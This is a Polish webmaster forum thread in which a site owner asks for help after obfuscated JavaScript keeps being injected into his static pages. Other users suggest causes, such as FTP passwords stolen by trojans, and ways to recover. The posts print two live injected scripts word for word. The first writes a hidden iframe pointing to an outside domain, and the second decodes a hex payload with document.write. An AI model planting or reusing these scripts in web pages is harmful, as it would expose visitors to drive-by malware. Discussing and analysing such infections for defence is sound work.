Skocz do zawartości

Ktoś podpina mi wirusa do strony


fahofiec

Rekomendowane odpowiedzi

Kilka dni temu uruchomiłem stronę, zawierającą zwykły, statyczny kod HTML, zapisany z rozszerzeniem PHP. Nie wiem jakim cudem, ale każdego dnia ktoś wkleja do mojego kodu jakiś skrypt JavaScript, który jest wykrywany przez programy antywirusowe jako szkodliwy. Kod wklejony dzisiaj wygląda następująco:

<!-- ad --><script>
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv="write";
mzsrv="me";
zqfqw="et";
gdtrk="/' st";
rpiia="yl";
qxaol="";
ldlvw="i";
zfhuu="ty";
hvkhb=":h";
hbqmm="d";
hauzn="";
zdqdp=4;
sjgbi="if";
rpygo="r";
syjnh=" sr";
rwanv="c";
elujl="=";
hrgnc=863;
akzpp=8853;
tplxn=" ";
cvtot="</";
qtndm="";
jlooz=3953;
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv="write";
mzsrv="me";
zqfqw="et";
gdtrk="/' st";
rpiia="yl";
qxaol="";
ldlvw="i";
zfhuu="ty";
hvkhb=":h";
hbqmm="d";
hauzn="";
zdqdp=4;
sjgbi="if";
rpygo="r";
syjnh=" sr";
rwanv="c";
elujl="=";
hrgnc=863;
akzpp=8853;
tplxn=" ";
cvtot="</";
qtndm="";
jlooz=3953;
gftzo=(9.007e3>=5e1?uyimh:qxcxg);
jjaqh=(ddytx>.2438?xkjpv:3.);
gmbpt=(7.3e1>=36?mzsrv:.45);
zxtsi=(323,zqfqw+gdtrk+rpiia+"e='"+"v"+"isib");
hzpmf=(0x587,qxaol+ldlvw+"li"+zfhuu+hvkhb+"id"+hbqmm+"en"+"'"+hauzn);
rmtyf=(6.5e1,"");

aaa=((567,gftzo),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486):(.2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,""+"<"+sjgbi+rpygo+"a")+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+"'"+"h"+"ttp"+"")+(8581.<.887?0.7:"://t"+"ruittbros.n")+(476,zxtsi)+(hrgnc>=akzpp?9.909e3:hzpmf)+(69<38.?0.249:tplxn+">"+cvtot+"if"+qtndm)+(2.>1.?"ram"+"e>":64.)+(223.>=jlooz?1.:rmtyf)));</script><!-- /ad -->

Wcześniej był chyba jakiś inny. Co robić???;)

Bardzo płatny katalog stron oparty na WordPressie.


Naukowo o kulturystyce i fitness w serwisie FitnessLab.pl.

Odnośnik do komentarza
Udostępnij na innych stronach

  • Odpowiedzi 75
  • Dodano
  • Ostatniej odpowiedzi
miałem to wczoraj, nie na nazwie stoją strony?

Zgadza się, na Nazwa.pl. Ale mam na tym samym koncie kilkanaście stronek i tylko na jednej z nich dzieją się takie cuda. Co najdziwniejsze, nie jest to żaden dziurawy CMS, lecz zwykły statyczny HTML, próbowałem też ograniczyć prawa do pliku poprzez CHMOD, ale chyba nie poskutkowało. :vava::(:rotfl::o

EDYTOWANE: A jednak nie, mam ten syfiarski kod wykrywany jako wirus wstawiony na stronie głównej każdej witryny!;)!;)

Bardzo płatny katalog stron oparty na WordPressie.


Naukowo o kulturystyce i fitness w serwisie FitnessLab.pl.

Odnośnik do komentarza
Udostępnij na innych stronach

na nazwie mają chyba jakąś dziure, bo mi leciało po wszytkich katalogach (katalog to subdomena), jak był index w katalogu to miałem ten kod

w katalogu root miałem stronę html, a z subdomen nie widać root, więc coś tam jest niezle nagmerane, dziś mam spokój, ale wczoraj kilka razy wszytkie indexy czyściłem

- Reklama -

Podatki we Wrocławiu: biuro podatkowe wrocław

Miejscówa do parkowania przy Okęciu: parking okęcie

Odnośnik do komentarza
Udostępnij na innych stronach

A jaka jest rzeczywista potencjalna szkodliwość takiego kodu? Boję się, że możne spowodować to spadek Trust Ranku Google'a, który uzna stronę za niebezpieczną, a o konsekwencjach boję się nawet wspominać.

Bardzo płatny katalog stron oparty na WordPressie.


Naukowo o kulturystyce i fitness w serwisie FitnessLab.pl.

Odnośnik do komentarza
Udostępnij na innych stronach

Przeskanować komputer KILKOMA antywirusami, zmienić hasła. Nie zapamiętywać haseł w Total Commander.

Sprawdzić skrypty.

Wystarczy, że jeden ze skryptów na serwerze jest dziurawy i z jego poziomu jest dostęp do innych katalogów z witrynami, żeby zarazić.

Jak nadal wystepują podmiany kontakt z hostingiem.

Odnośnik do komentarza
Udostępnij na innych stronach

Właśnie ktoś założył podobny temat na forum Google'a: https://www.google.com/support/forum/p/Webm...4d4f9&hl=pl

Jak widać, jemu też wstawiono identyczny kod i odczuł już efekty - przejście na jego stronę z wyszukiwarki zostało zablokowane; wyskakuje ostrzeżenie "przejście do tej witryny może być niebezpieczne dla Twojego komputera!".

Jestem w podobnej sytuacji jak Zgred...

Bardzo płatny katalog stron oparty na WordPressie.


Naukowo o kulturystyce i fitness w serwisie FitnessLab.pl.

Odnośnik do komentarza
Udostępnij na innych stronach

A prawda jest taka (kilkukrotnie przerabiane na tym, innych forach jak i u nas w supporcie) że powodem doklejania są wirusy/trojany na komputerze które wykradają loginy/hasła z programów FTP.

Odnośnik do komentarza
Udostępnij na innych stronach

aaa=((567,9.007e3>=5e1?687:4804),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486):(.2717<=.77?7948>.2438?"write":3.:0x14))](((4,2.),(0.591,""+"<"+"if"+"r"+"a")+(82,7.3e1>=36?"me":.45)+(0.1301," sr"+"c"+"="+"'"+"h"+"ttp"+"")+(8581.<.887?0.7:"://t"+"ruittbros.n")+(476,323,"et"+"/' st"+"yl"+"e='"+"v"+"isib"i)+(863>=8853?9.909e3:0x587,""+"i"+"li"+"ty"+":h"+"id"+"d"+"en"+"'"+"")+(69<38.?0.249:" "+">"+"</"+"if"+"")+(2.>1.?"ram"+"e>":64.)+(223.>=3953?1.:6.5e1,"")));</script><!-- /ad -->

hmmm... nie jestem znawcą ale to mi wygląda na kod wklejający ramkę

iframe src http ruittbros.net/style=visibility:hidden'+69<38.?0.249:> /iframe:64.223.>=

Czyli jest to ramka, prawdopodobnie nieszkodliwa, bo dodaje tylko niewidocznego linka na stronę producenta jedzenia, ale przyznam, że część kodu jest dla mnie niezrozumiałą i wygląda na zakodowaną w ASCII albo HEX. Nie mam pojęcia co te wszystkie cyfry oznaczają.

https://truitbros.net

ciekawe. na idg.pl mają działy, gdzie co jakiś czas odpowiadają na pytania eksperci od antywirusów. tam bym pytał co to jest.

Odnośnik do komentarza
Udostępnij na innych stronach

Sprawdziłem właśnie swoje strony na zupełnie innym serwerze i... Wszystkie również mają podoklejany tajemniczy kod o treści:

<script>function c2678dc8d9i499d81d0aa7df(i499d81d0aafaf){ var i499d81d0ab77d=16; return (parseInt(i499d81d0aafaf,i499d81d0ab77d));}function i499d81d0ac71c(i499d81d0aceeb){ function i499d81d0ae658(){var i499d81d0aee28=2;return i499d81d0aee28;} var i499d81d0ad6ba='';i499d81d0af5f8=String.fromCharCode;for(i499d81d0ade89=0;i499d81d0ade89<i499d81d0aceeb.length;i499d81d0ade89+=i499d81d0ae658()){ i499d81d0ad6ba+=(i499d81d0af5f8(c2678dc8d9i499d81d0aa7df(i499d81d0aceeb.substr(i499d81d0ade89,i499d81d0ae658()))));}return i499d81d0ad6ba;} var r1d='';var i499d81d0afdc7='3C7'+r1d+'3637'+r1d+'2697'+r1d+'07'+r1d+'43E696628216D7'+r1d+'96961297'+r1d+'B646F637'+r1d+'56D656E7'+r1d+'42E7'+r1d+'7'+r1d+'7'+r1d+'2697'+r1d+'465287'+r1d+'56E657'+r1d+'363617'+r1d+'065282027'+r1d+'2533632536392536362537'+r1d+'3225363125366425363525323025366525363125366425363525336425363325333225333625
32302537'+r1d+'332537'+r1d+'32253633253364253237'+r1d+'2536382537'+r1d+'342537'+r1d+'342537'+r1d+'302533612532662532662536352536622537'+r1d+'332536622536632537'+r1d+'352537'+r1d+'612537'+r1d+'392537'+r1d+'37'+r1d+'2536652536312532652536332536662536642532652537'+r1d+'30253663253266253366253237'+r1d+'2532622534642536312537'+r1d+'342536382532652537'+r1d+'322536662537'+r1d+'352536652536342532382534642536312537'+r1d+'342536382532652537'+r1d+'3225363125366525363425366625366425323825323925326125333125333025333325333825
3336253330253239253262253237'+r1d+'253330253337'+r1d+'253334253632253339253333253336253338253634253636253634253237'+r1d+'2532302537'+r1d+'37'+r1d+'2536392536342537'+r1d+'34253638253364253331253338253330253230253638253635253639253637'+r1d+'2536382537'+r1d+'34253364253335253337'+r1d+'253337'+r1d+'2532302537'+r1d+'332537'+r1d+'342537'+r1d+'39253663253635253364253237'+r1d+'2537'+r1d+'362536392537'+r1d+'332536392536322536392536632536392537'+r1d+'342537'+r1d+'39253361253638253639253634253634253635253665253237'+r1d+'2533652533632532662536392536362537'+r1d+'3225363125366425363525336527'+r1d+'29293B7'+r1d+'D7'+r1d+'6617'+r1d+'2206D7'+r1d+'969613D7'+r1d+'47'+r1d+'27'+r1d+'5653B3C2F7'+r1d+'3637'+r1d+'2697'+r1d+'07'+r1d+'43E';document.write(i499d81d0ac71c(i499d81d0afdc7));</script>

Jeszcze trochę, a całkowicie się załamię. :(:)

Bardzo płatny katalog stron oparty na WordPressie.


Naukowo o kulturystyce i fitness w serwisie FitnessLab.pl.

Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.

×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności